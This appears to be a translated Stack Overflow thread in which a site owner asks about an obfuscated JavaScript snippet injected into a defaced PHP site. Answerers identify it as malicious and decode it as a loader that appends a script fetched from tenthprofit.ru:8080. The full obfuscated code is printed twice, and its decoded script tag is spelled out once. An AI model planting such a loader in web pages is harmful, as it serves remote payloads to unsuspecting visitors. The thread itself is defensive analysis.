此脚本已添加到运行PHP的客户端网站的污损网页中。我不知道这个脚本可以做什么,也不知道这是否真的是恶意的。有人可以提出建议。请在下面找到代码......
var GU = '';
var h;
var X = new String();
var mP = "";
H = function () {
var F = ["hu"];
function L(Lc, O, d) {
return Lc.substr(O, d);
}
OH = 55345;
OH -= 37;
var x = document;
QM = 6929;
QM++;
q = 25298;
q -= 65;
var t = '';
var vs = {};
var u = ["hR"];
var Oi = RegExp;
var A = {
kh: "LQ"
};
var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
yz = {
Ec: false
};
function y(Lc, O) {
hI = 24414;
hI++;
g = {};
a = 28529;
a--;
var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
var m = new Oi(d, String("g"));
n = {
kW: 40818
};
ly = {
HN: false
};
return Lc.replace(m, t);
};
ZW = 9686;
ZW -= 202;
GE = 56525;
GE -= 235;
D = ["u_", "QP"];
var E = null;
var vd = {
ka: "J"
};
var Jn = new Date();
Xg = {
V: 51919
};
var l = 751407 - 743327;
try {} catch (U) {};
var W = new String("body");
var qi = "qi";
this.Vf = 38797;
this.Vf--;
var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
var RlE = 58536;
var Xx = false;
this.jo = '';
vi = 41593;
vi--;
h = function () {
try {
var YU = new String();
var DY = "";
var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
CN = {
_Y: 63379
};
s = x[dY](P);
var fH = "fH";
pI = 33929;
pI--;
Uw = [];
var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
var Wg = [];
var Lc = l + v;
var yW = new String();
var iO = new String();
var Oe = String("defe" + "r");
var Et = ["qO", "AF"];
var QX = 13548;
s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
PA = {};
s[Oe] = [2, 1][1];
this.Vt = "Vt";
var ho = 46131;
try {
var kn = 'cI'
} catch (kn) {};
this.ww = 27193;
this.ww += 97;
x[W].appendChild(s);
this.yk = 60072;
this.yk++;
var Lp = new Date();
} catch (PY) {
this.ku = 43483;
this.ku++;
this.ra = 47033;
this.ra--;
this.ru = "ru";
};
var lu = new Array();
var me = new String();
};
};
YB = ["LB", "uM"];
var AI = {
Vm: 4707
};
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
window.onload = h;
var PQ = false;
var mF = {
Hm: false
};
try {
var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";
答案 0 :(得分:7)
如果您没有添加它,那么它肯定会归类为恶意。
答案 1 :(得分:5)
是的,这当然是恶意的。它试图看起来像谷歌的一部分:
new String("/goo" + "gle." + L("com/DyBg", 0, 4)
但它实际上在tenthprofit.ru上做了一些事情(重定向/信息收集)
new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
最好是保存此代码并将其从页面中删除。
为了使其更具可读性,您可以通过以下方式运行它: Jsbeautifier
答案 2 :(得分:3)
此脚本将新的<script>元素添加到HTML文件的正文,该文件尝试加载“tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php”作为标记的src元素。它被取消了,所以它现在应该是无害的。
添加以下行BODY标记的末尾:
<script src="http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"></script>
答案 3 :(得分:1)
var GU = '';
var h;
var X = new String();
var mP = "";
H = function () {
var F = ["hu"];
function L(Lc, O, d) {
return Lc.substr(O, d);
}
OH = 55345;
OH -= 37;
var x = document;
QM = 6929;
QM++;
q = 25298;
q -= 65;
var t = '';
var vs = {};
var u = ["hR"];
var Oi = RegExp;
var A = {
kh: "LQ"
};
var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
yz = {
Ec: false
};
function y(Lc, O) {
hI = 24414;
hI++;
g = {};
a = 28529;
a--;
var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
var m = new Oi(d, String("g"));
n = {
kW: 40818
};
ly = {
HN: false
};
return Lc.replace(m, t);
};
ZW = 9686;
ZW -= 202;
GE = 56525;
GE -= 235;
D = ["u_", "QP"];
var E = null;
var vd = {
ka: "J"
};
var Jn = new Date();
Xg = {
V: 51919
};
var l = 751407 - 743327;
try {} catch (U) {};
var W = new String("body");
var qi = "qi";
this.Vf = 38797;
this.Vf--;
var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
var RlE = 58536;
var Xx = false;
this.jo = '';
vi = 41593;
vi--;
h = function () {
try {
var YU = new String();
var DY = "";
var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
CN = {
_Y: 63379
};
s = x[dY](P);
var fH = "fH";
pI = 33929;
pI--;
Uw = [];
var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
var Wg = [];
var Lc = l + v;
var yW = new String();
var iO = new String();
var Oe = String("defe" + "r");
var Et = ["qO", "AF"];
var QX = 13548;
s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
PA = {};
s[Oe] = [2, 1][1];
this.Vt = "Vt";
var ho = 46131;
try {
var kn = 'cI'
} catch (kn) {};
this.ww = 27193;
this.ww += 97;
x[W].appendChild(s);
this.yk = 60072;
this.yk++;
var Lp = new Date();
} catch (PY) {
this.ku = 43483;
this.ku++;
this.ra = 47033;
this.ra--;
this.ru = "ru";
};
var lu = new Array();
var me = new String();
};
};
YB = ["LB", "uM"];
var AI = {
Vm: 4707
};
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
window.onload = h;
var PQ = false;
var mF = {
Hm: false
};
try {
var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";
我认为这条线特别令人毛骨悚然:
s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
它将s[G]设置为tenthprofit.ru上的网址。
答案 4 :(得分:0)
如果你想回答你的问题,我 猜你需要格式化你的代码 看上去好些。在一个更强大的人类可读性 形式
像这样How to scroll the horizontal scrollbar in an iFrame from the parent frame?
修改
此外,您的“恶意”脚本也会破坏SO网站。它肯定是恶意的
答案 5 :(得分:0)
嗯,根据定义,它是恶意的,因为它是作为污损的一部分添加的。它似乎将人们重定向到tenthprofit.ru,但我没有运行它,所以这是基于对(混淆的)代码的粗略检查。